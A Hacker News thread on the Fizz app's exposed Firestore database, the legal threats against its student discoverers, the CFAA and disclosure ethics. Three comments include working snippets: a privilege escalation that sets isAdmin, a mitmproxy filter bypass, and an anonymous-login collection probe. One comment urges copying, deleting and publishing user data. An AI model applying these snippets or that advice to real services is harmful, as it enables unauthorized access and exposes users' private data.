As a user of the site who has been falsely assured that your data is "100% secure" and totally anonymous, is that data in fact not your property? Perhaps not in a strictly legal sense, but from an ethical standpoint it is certainly more of a grey area than corporations and their lawyers would want us to roll over and accept.
My understanding is that these security researchers only accessed their own accounts and data on the cloud servers, and in doing so they did not bypass any "effective technical protections on access."
Thankfully for all of us, the DoJ appears to disagree with your sentiment. At least with the current administration.
Is it your position that when you are lied to, and your sensitive and personally identifying information is being grossly mishandled by a company, your only recourse is to spend thousands of dollars and incredible amounts of time on a court case that has very little chance of achieving anything?
tptacek|2 years ago
* Fizz appears to be a client/server application (presumably a web app?)
* The testing the researchers did was of software running on Fizz's servers
* After identifying a vulnerability, the researchers created administrator accounts using the database activity they obtained
* The researchers were not given permission to do this testing
If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
At least three things mitigate their legal risk:
1. It's very clear from their disclosure and behavior after disclosing that they were in good faith conducting security research, making them an unattractive target for prosecution.
2. It's not clear that they did any meaningful damage (this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplating retaining a forensics firm or truing things up with their insurers, who probably did not exist), meaning there wouldn't have been much to prosecute.
3. Fizz's lawyers fucked up and threatened a criminal prosecution in order to obtain a valuable concession fro the researchers, which, as EFF points out, violates a state bar rule.
I think the good guys prevailed here, but I'm wary of taking too many lessons from this; if this hadn't been "Fizz", but rather the social media features of Dunder Mifflin Infinity, the outcome might have been gnarlier.
tptacek|2 years ago
https://www.justice.gov/opa/pr/department-justice-announces-...
AnthonyMouse|2 years ago
This seems like a problem with the existing law, if that's how it works.
It puts the amount of "damages" in the hands of the "victim" who can choose to spend arbitrary amounts of resources (trivial in the scope of a large bureaucracy but large in absolute amount), providing a perverse incentive to waste resources in order to vindictively trigger harsh penalties against an imperfect actor whose true transgression was to embarrass them.
And it improperly assigns the cost of such measures, even to the extent that they're legitimate, to the person who merely brought their attention to the need for them. If you've been operating a publicly available service with a serious vulnerability you still have to go through everything and evaluate the scope of the compromise regardless of whether or not this person did anything inappropriate, in case someone else did. The source of that cost was their own action in operating a vulnerable service -- they should still be incurring it even if they discovered the vulnerability themselves, but not before putting it in production.
The damages attributable to the accused should be limited to the damage they actually caused, for example by using access to obtain customer financial information and committing credit card fraud.
emilecantin|2 years ago
It reminds me of the case where AT&T had their iPad data subscriber data just sitting there on an unlisted webpage. Don't remember which way it went, but I think the guy went out of his way there to get all the data he could get, which isn't the case here.
theptip|2 years ago
The OP doesn’t seem to have a “mea culpa” so I hope they learned this lesson even if the piece is more meme-worthy with a “can you believe what these guys tried to do?” tone.
While their intent seems good, they were pretty clearly breaking the law.
gsdofthewoods|2 years ago
Last year, the department updated its CFAA charging policy to not pursue charges against people engaged in "good-faith security research." [1] The CFAA is famously over-broad, so a DOJ policy is nowhere near as good as amending the law to make the legality of security research even clearer. Also, this policy could change under a new administration, so it's still risky—just less risky than it was before they formalized this policy.
[1] https://www.justice.gov/opa/pr/department-justice-announces-...
mewse-hn|2 years ago
"My clients did not violate the CFAA" should logically be interpreted as "good fucking luck arguing that my good faith student security researcher clients violated the CFAA in court".
bawolff|2 years ago
Ignoring the legalities of it all, this step crosses a line morally imo.
shkkmo|2 years ago
> At the time, Fizz used Google’s Firestore database product to store data including user information and posts. Firestore can be configured to use a set of security rules in order to prevent users from accessing data they should not have access to. However, Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly and access a significant amount of sensitive user data.
> We found that phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information. It was possible to identify the author of any post on the platform.
So AFAICT there is no indication they created any admin accounts to access the data. This is yet another example of an essentially publicly accessible database that holds what was supposed to be private information. This seems like a far less clear application of the CFAA than the pattern of facts you describe.
hnav|2 years ago
jmholla|2 years ago
We all here no, there is no such thing as something 100% secure, but if you're gonna go making wild claim, you should have to stand by them.
TheNewsIsHere|2 years ago
Even if you are engaged in legitimate security research, it is highly unethical and unprofessional to willfully exceed your engagement limits. You may not even know the full reasoning of why those limits are established.
singleshot_|2 years ago
Fizz may have violated more than a state bar rule; this could very well be extortion (depending).
I would tend to agree with the balance of your comments.
whimsicalism|2 years ago
kjjw|2 years ago
[deleted]
jbombadil|2 years ago
I've seen examples of an employee contract, with things like "if any piece of this contract is invalid it doesn't invalidate the rest of the contract". The employer is basically trying to enforce their rules (reasonable), but they have no negative consequences if what they write is not allowed. At most a court deems that piece invalid, but that's it. The onus is on the reader to know (which tends to be a much weaker party).
Same here. Why can a company send a threatening letter ("you'll go 20 years to federal prison for this!!"), when it's clearly false? Shouldn't there be an onus on the writer to ensure that what they write is reasonable? And if it's absurdly and provably wrong, shouldn't there be some negative consequences more than "oh, nevermind"?
mentalpiracy|2 years ago
This concept of severability exists in basically all contracts, and is generally limited to sections that are not fundamental to the nature of the agreement. (The extent of what qualifies as fundamental is, as you said, up to a court to interpret.)
In your specific example of an employee contract, severability actually protects you too, by ensuring all the other covenants of your agreement - especially the ones that protect you as the individual - will remain in force even if a sub section is invalidated. Otherwise, if the whole contract were invalidated, you'd be starting from nothing (and likely out of a job). Some protections are better than zero.
gingerrr|2 years ago
Severability (the ability to "sever" part of a contract, leaving the remainder intact so long as it's not fundamentally a change to the contract's terms) comes from constitutional law and was intended to prevent wholesale overturning of previous precedent with each new case. It protects both parties from squirreling out of an entire legal obligation on a technicality, or writing poison pills into a contract you know won't stand up to legal scrutiny.
If part of the contract is invalidated, they can't leverage it. If that part being invalidated changes the contract fundamentally, the entire contract is voided. What more do you want?
It seems like you're arguing for some sort of punitive response to authoring a bad contract? That seems like a pretty awful idea re: chilling effect on all legal/business relationship formation, and wouldn't that likely impact the weaker parties worse as they have less access to high-powered legal authors? That means that even negotiating wording changes to a contract becomes a liability nightmare for the negotiators, doesn't that make the potential liability burden even more lopsided against small actors sitting across the table from entire legal teams?
I guess I'm having trouble seeing how the world you're imagining wouldn't end up introducing bigger risk for weaker parties than the world we're already in.
MajimasEyepatch|2 years ago
Imagine an employment contract that contains a non-compete clause (ignore, for a moment, your personal beliefs about non-compete clauses). The company may have a single employment contract that they use everywhere, and so in states where non-competes are illegal, the severability clause allows them to avoid having separate contracts for each jurisdiction. And now suppose that a state that once allowed non-competes passes a law banning them: should every employment contract with a non-compete clause suddenly become null and void? Of course not. That's what severability is for.
In the case in the OP, it's hard to say what the context is of the threat, but I imagine something along the lines of, "Unauthorized access to our computer network is a federal crime under statute XYZ punishable by up to 20 years in prison." Scary as hell to a layperson, but it's not strictly speaking untrue, even if most lawyers would roll their eyes and say that they're full of shit. Sure, it's misleading, and a bad actor could easily take it too far, but it's hard to know exactly where to draw the line if lawyers couch a threat in enough qualifiers.
At the end of the day, documents like this are written by lawyers in legalese that's not designed for ordinary people. It's shitty that they threatened some college students with this, and whatever lawyer did write and send this letter on behalf of the company gave that company tremendously poor advice. I guess you could complain to the bar, but it would be very hard to make a compelling case in a situation like this.
(This is also one of the reasons why collective bargaining is so valuable. A union can afford legal representation to go toe to toe with the company's lawyers. Individual employees can't do that.)
bdowling|2 years ago
LastTrain|2 years ago
convolvatron|2 years ago
fallingknife|2 years ago
anigbrowl|2 years ago
treis|2 years ago
hnfong|2 years ago
bagels|2 years ago
f0e4c2f7|2 years ago
Sure you still get some of that today. An especially old fashioned company, or in this case naive college students but overall things have shifted quite dramatically in favor of disclosure. Dedicated middle men who protect security researcher's identities, Large enterprises encouraging and celebrating disclosure, six figure bug bounties, even the laws themselves have changed to be more friendly to security researchers.
I'm sure it was quite unpleasant to go through this for the author, but it's a nice reminder that situations like this are now somewhat rare as they used to be the norm (or worse).
lamontcg|2 years ago
The fact that a lot of companies have embraced bug bounties and encourage this kind of stuff against them unfortunately teaches "kids" that this kind of thing is perfectly legal/moral/ethical/etc.
As this story shows though you're really rolling the dice, even though it worked out in this case.
> Discussions in forums / BBS's would be around if it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
This is probably still a better idea if you don't have the cooperation of the target of the hack via some stated bug bounty program. But that doesn't help the security researcher "make a name" for themselves.
And you're basically admitting to the fact that you trespassed, even if all you did was the equivalent of walking through an unlocked door and verifying that you could look inside their refrigerator.
The fact that it may play out in the court of public opinion that you were helping to expose the lies of a corporation doesn't change the fact that in the actual courts you are guilty of a crime.
formerly_proven|2 years ago
This is still the way to go even in many western countries.
mewse-hn|2 years ago
https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
icameron|2 years ago
That's wild!
iancarroll|2 years ago
A long time ago I was able to get admin access to an electric scooter company by updating my Firebase user to have isAdmin set to true, and then I accidentally deleted the scooter I was renting from Firebase. I am not sure what happened to it after that.
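For anyone wondering what that looks like mechanically: with Firebase, the client talks to the database directly, so if the security rules only check *who* is writing and not *which fields* they're changing, any logged-in user can promote themselves. A hypothetical Firestore-flavored sketch (the project ID, collection, and field names are made up, not the company's actual schema):

```python
# Hypothetical sketch of the bug class, not the company's actual schema:
# a Firestore backend whose security rules let an authenticated user write
# their own user document, without restricting WHICH fields may change.
import requests

PROJECT_ID = "example-app"   # ships inside every client build
ID_TOKEN = "eyJ..."          # ordinary user token from Firebase Auth
UID = "my-own-uid"

url = (
    f"https://firestore.googleapis.com/v1/projects/{PROJECT_ID}"
    f"/databases/(default)/documents/users/{UID}"
    "?updateMask.fieldPaths=isAdmin"
)
resp = requests.patch(
    url,
    headers={"Authorization": f"Bearer {ID_TOKEN}"},
    json={"fields": {"isAdmin": {"booleanValue": True}}},
)
# If the rules only check request.auth.uid == UID, this returns 200 and the
# backend now treats an ordinary user as an administrator.
print(resp.status_code)
```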
morpheuskafka|2 years ago
You could also bypass the filter preventing searching for over-18 users if you are under 18 (and the under-18 filter if you are over), as well as paid-only filters like location, gender, etc., by rewriting the requests with mitmproxy (paid status is not checked server-side).
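The rewrite itself is trivial once the traffic is visible. A hypothetical mitmproxy addon along these lines (the host, endpoint, and JSON field names are invented for illustration; the real request shape would come from watching the app's traffic):

```python
# Hypothetical mitmproxy addon illustrating the rewrite described above.
# The host, endpoint, and JSON field names are invented for illustration.
import json

from mitmproxy import http


def request(flow: http.HTTPFlow) -> None:
    # Only touch the app's API traffic.
    if flow.request.pretty_host != "api.example-fizz.invalid":
        return
    if flow.request.method == "POST" and flow.request.path.startswith("/search"):
        body = json.loads(flow.request.get_text())
        body["ageFilter"] = None     # enforced only in the client UI
        body["isPaidUser"] = True    # premium flag the server never re-checks
        flow.request.set_text(json.dumps(body))
```

Run it with `mitmproxy -s rewrite_filters.py` and point the phone's proxy at it; anything the server doesn't independently verify is editable in transit.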
gregsadetsky|2 years ago
I imagine a web tool that could take the app ID and other API values (which are publicly embedded in frontend apps), optionally accept a session ID (for those Firestore apps whose only security rule is a lightweight "only visible to logged-in users"), and take names of collections (found in the JS code) to explore? Something like the probe sketched below.
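A rough sketch of the core loop such a tool might run, assuming the target uses Firebase Auth (with anonymous sign-in enabled) plus Firestore; the API key, project ID, and collection names here are placeholders for values scraped from the frontend bundle:

```python
# Rough sketch of the probe such a tool might run. The API key, project ID,
# and collection names are placeholders scraped from the app's JS bundle.
import requests

API_KEY = "AIza..."                           # public web API key from the frontend
PROJECT_ID = "example-app"
COLLECTIONS = ["users", "posts", "messages"]  # guessed from the client code

# Anonymous sign-in: enough for apps whose only rule is "must be logged in".
auth = requests.post(
    f"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key={API_KEY}",
    json={"returnSecureToken": True},
).json()
token = auth["idToken"]

for coll in COLLECTIONS:
    resp = requests.get(
        f"https://firestore.googleapis.com/v1/projects/{PROJECT_ID}"
        f"/databases/(default)/documents/{coll}?pageSize=5",
        headers={"Authorization": f"Bearer {token}"},
    )
    # 200 with documents => collection readable to any logged-in stranger;
    # 403 => the security rules actually held.
    print(coll, resp.status_code)
```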
mustacheemperor|2 years ago
>Although Fizz released a statement entitled “Security Improvements Regarding Fizz” on Dec. 7, 2021, the page is no longer navigable from Fizz’s website or Google searches as of the time of this article’s publication.
And it seems likely the app still stores personally identifiable information about its "anonymous" users' activity.
> Moreover, we still don’t know whether our data is internally anonymized. The founders told The Daily last year that users are identifiable to developers. Fizz’s privacy policy implies that this is still the case
I suppose the 'developers' may include the same founders who have refused to comment on this, removed their company's communications about it, and originally leveraged legal threats over being caught marketing a completely leaky bucket as a "100% secure social media app." Can't say I'm in a hurry to put my information on Fizz.
gruez|2 years ago
1. Threatening violence is explicitly a crime.
2. At a higher level, threatening violence is a crime because the underlying act (committing violence) is also a crime. Threatening to do a legal act is largely legal; it's not illegal to threaten to report someone to the authorities, for instance.
SenAnder|2 years ago
Legally, can this cover talking to e.g. state prosecutors and the police as well? Because claiming to be "100% secure" while knowing you are not secure, and that your users have no protection against spying by you or any minimally competent hacker, is fraud at minimum, and closer to criminal wiretapping: you're knowingly tricking your users into revealing their secrets on your service while they believe they are "100% secure".
That this ended "amicably" is frankly a miscarriage of justice - the Fizz team should be facing fraud charges.
manicennui|2 years ago
We care more about corporations than citizens in the US. Advertising in the US is full of false claims. We ignore this because we pretend like words have no meaning.
monksy|2 years ago
Fantastic for calling Fizz out. "Fizz did not protect their users’ data. What happened next?" This isn't a "someone hacked them" story; it's that Fizz failed to do what they promised.
I'm still curious to hear whether the vulnerability has been retested to confirm it's resolved.
davesque|2 years ago
I don't think this applies to the reporter in this case, but it does seem like there's a bit of a trend in security research lately to capitalize on the publicity of finding a vulnerability for one's own personal branding. That feels a bit disingenuous. Not that the appropriate response would be to threaten someone with legal action.
pie_flavor|2 years ago
It's not about personal branding, it's about protecting the users of the app. Either the app fixes the vulnerability so the users are no longer in danger, or the users are made aware that they are in danger.
Lalabadie|2 years ago
It's completely fine to discuss or request a different disclosure date when communicating with researchers. The disclosure deadline is the researchers' protection against inaction.
ryandrake|2 years ago
It's practically a given that the actual security (or privacy) of a piece of software is inversely proportional to its claimed security and to how loud those claims are. Also, the companies that pay the least attention to security are always the ones who later, after the breach, say "We take security very seriously..."
consoomer|2 years ago
In all honesty, nothing good usually comes from that. If they wanted the truth exposed, they would have been better off doing it anonymously, to the company and/or to the public if needed.
It's one thing to happen upon a vulnerability in normal use and report it. It's a different beast to gain access to servers you don't own and start touching things.
nickdothutton|2 years ago
“Keep calm” and “be responsible” and “speak to a lawyer” are things I class as common sense. The gold nugget I was looking for was the red flashing shipwreck buoy/marker over the names.
meepmorp|2 years ago
https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
hermannj314|2 years ago
Am I to understand you can attempt to hack any computer to gain unauthorized access without prior approval? That doesn't seem legal at all.
Whether or not there was a vulnerability, was the action taken actually legal under current law? I don't see anything indicating for or against in the article. Just posturing that "ethical hacking" is good and saying you are secure when you aren't is bad. None of that seems relevant to the actual question of what the law says.
tptacek|2 years ago
(b) You don't require permission to test software running on hardware you control (absent some contract that says otherwise).
(c) But you're right, in this case, the researchers presumably did need permission to conduct this kind of testing lawfully.
utopcell|2 years ago
Kudos to Cooper, Miles and Aditya for seeing this through.
SoftTalker|2 years ago
They could threaten to report you to the police or such authorities, but they would have to turn over their evidence to them and to you and open all their relevant records to you via discovery.
> Get a lawyer
Yes, if they're seriously threatening legal action they already have one.
meepmorp|2 years ago
That's not true, depending on where you live in the US. Several states allow private citizens to file criminal charges with a magistrate. IIRC, NJ law allows actual private prosecution of criminal charges, subject to approval by a judge and prosecutor. I think that's a holdover from English common law.
lightedman|2 years ago
That would've been a better legal threat to put on them as an offensive move, instead of going through the EFF. "Sure, you can attempt to have me jailed, but your threat is clear-cut felony extortion. See you in the jail cell right there with me!"
sublinear|2 years ago
Maybe it's because I'm getting old, but it would never cross my mind to take any of this personally.
If they're this bad at security, this bad at marketing, and then respond to a fairly standard vulnerability disclosure with legal threats it's pretty clear they have no idea what they're doing.
Being the "good guy" can sometimes be harder than being the "bad guy", but suppressing your emotions is a basic requirement for being either "guy".
kdmccormick|2 years ago
Yup, that's it :) These kids are either in college or just graduated. They were smart enough to get themselves legal help before saying anything stupid, which is impressive. Cut them some slack!
ngai_aku|2 years ago
And yet, according to the linked article in the Stanford Daily, they received $4.5 million in funding
michaelmrose|2 years ago
This is wholly and obviously illegal, but so is the described ethical hacking. You have adopted a complex, nuanced strategy to minimize harm to all parties. That is great morally, but as far as I can tell it's only meaningful legally insofar as it makes folks less likely to go after you; nothing about it makes your obviously illegal actions legal. So if you are going to openly flout the law, it makes sense to put less of a target on your back while you are breaking it.
datacruncher01|2 years ago
When there isn't an already-established process, payouts for finding bugs either won't be worth your time, or the reports will be seen as malicious activity.
winter_blue|2 years ago
The next time someone discovers a company with poor database security, they should, IMO: (1) make a full copy of the confidential user data, (2) delete all data on the server, (3) publish the confidential user data on some dumping site, and (4) protect their anonymity while doing all of the above.
If these researchers had done (2) and (3) – and done so anonymously, that would have not only protected them from legal threats/harm, but also effectively killed off a company that shouldn't exist – since all of Buzz/Fizz users would likely abandon it as consequence.
jstarfish|2 years ago
Aaron Swartz only did (1). Failing at (4) didn't end so well for him.
I get that you're frustrated but encouraging others to make martyrs of themselves is cowardice. If some dumb kid tries this and their opsec isn't bulletproof, they're fucked. Put your own skin in the game and do it yourself if your convictions are that strong.
AnimalMuppet|2 years ago
It's especially unwise because you now give the company a massive incentive to hire real forensics specialists to try to track you down. You're placing a lot of faith in your ability to remain anonymous under that level of scrutiny.
dragonwriter|2 years ago
No, it wouldn’t. Anonymity can be penetrated, and the more incentive people have to do so, the more likely it will be.
rootusrootus|2 years ago
Is that the clinical term for Internet Tough Guy?
I imagine deleting the DB would almost certainly lead to actual CFAA consequences. Which kinda suck, as I recall.
pityJuke|2 years ago
[0]: https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
jerf|2 years ago
Personally, I don't see it as worth it to pursue a company that does not hang out some sort of public permission to poke at them. The upside is minimal and the downside significant. Note this is a descriptive statement, not a normative statement. In a perfect world... well, in a perfect world there'd be no security vulnerabilities to find, but... in a perfect world sure you'd never get in trouble for poking through and immediately backing off, but in the real world this story just happens too often. Takes all the fun right out of it. YMMV.
c4mpute|2 years ago
Nothing else is ethically viable. Nothing else protects the researcher.
Buttons840|2 years ago
And this during a time when thousands or millions of people have their personal data leaked every other week, over and over, because companies don't want to cut into their profits.
Researchers who do the right thing face legal threats of 20 years in prison. Companies who cut corners on security face no consequences. This seems backwards.
Remember when a journalist pressed F12 and saw that a Missouri state website was exposing the personal data of every teacher in the state (including SSNs)? He reported the security flaw responsibly, but it embarrassed the state, so the Governor attacked him and legally harassed him. https://arstechnica.com/tech-policy/2021/10/missouri-gov-cal...
I once saw something similar: a government website exposing the personal data of licensed medical professionals. A REST API responded with all their personal data (including SSN, address, etc.), but the HTML frontend wouldn't display it. All that data was just one unauthenticated REST call away, for thousands of people in the state. What did I do? I closed the tab and never touched the site again. It wasn't worth the personal risk to try to do the right thing, so I ignored it, and for all I know those people had their data stolen multiple times over because of this flaw. I found it as part of my job at the time; I don't remember the details anymore, and it has probably been fixed by now. Our legal system made it a huge personal risk to do the right thing, so I didn't do the right thing.
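The anti-pattern is depressingly simple. A minimal sketch of what it looks like (Flask chosen arbitrarily; the route and field names are made up, and nothing here is the actual state site):

```python
# Minimal sketch of the anti-pattern described above (Flask chosen arbitrarily;
# the field names are made up, nothing here is the actual state site).
from flask import Flask, jsonify

app = Flask(__name__)

LICENSEES = {
    "12345": {
        "name": "Jane Doe",
        "license_no": "RN-12345",
        "ssn": "123-45-6789",      # should never leave the server
        "home_address": "1 Main St",
    }
}

@app.route("/api/licensees/<licensee_id>")
def licensee(licensee_id):
    # No auth, no field filtering: the endpoint returns everything the DB
    # holds and trusts the HTML frontend to display only name and license.
    # Anyone who opens dev tools (or curls the URL) sees the rest.
    return jsonify(LICENSEES.get(licensee_id, {}))
```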
Which brings me to my point. We need strong protections for those who expose security flaws in good faith. Even if someone is a grey hat and has done questionable things as part of their "research", as long as they report their security findings responsibly, they should be protected.
Why have we prioritized making things nice and convenient for the companies over all else? If every American's data gets stolen in a massive breach, it's so sad, but there's nothing we can do (shrug). If one curious user or security researcher pokes an app and finds a flaw, and they weren't authorized to do so, OMG, that person needs to go to jail for decades, how dare they press F12!!!1
This is a national security issue. While we continue to see the same stories of massive breaches in the news over and over and over, and some of us get yet another free year of monitoring to make sure the credit agencies don't commit libel against us, just remember that we put the convenience of companies above all else. They get to opt in to having their security tested, and over and over they fail us.
Protect security researchers, and make it legal to test the security of an app even if the owning company does not consent. </rant>
sleepybrett|2 years ago
If that happens the whole calculus of bug bounties changes immediately.
asynchronous|2 years ago
How do devs forget this step before raising 4.5 million in seed funding?
trostaft|2 years ago
The writing felt fine to me, if a bit terse.
Buttons840|2 years ago
If a curious kid does a port scan, police will smash down doors and people will face decades in prison.
If a negligent company leaks the private data of every single American: well, gee, what more could we have done? We had that one company do an audit and they didn't find anything, and, gee, we're just really sorry, so let's all move on, and here's a free year of credit monitoring, which you may choose to continue paying us for when the free year ends.
SenAnder|2 years ago
It's effectively legalizing fraud for a big chunk of computer security. Sure, fraud itself is technically still illegal, but so is exposing it.
InSteady|2 years ago
My understanding is that these security researchers only accessed their own accounts and data on the cloud servers, and in doing so they did not bypass any "effective technical protections on access."
Thankfully for all of us, the DoJ appears to disagree with your sentiment. At least with the current administration.
Is it your position that when you are lied to, and your sensitive and personally identifying information is grossly mishandled by a company, your only recourse is to spend thousands of dollars and an incredible amount of time on a court case that has very little chance of achieving anything?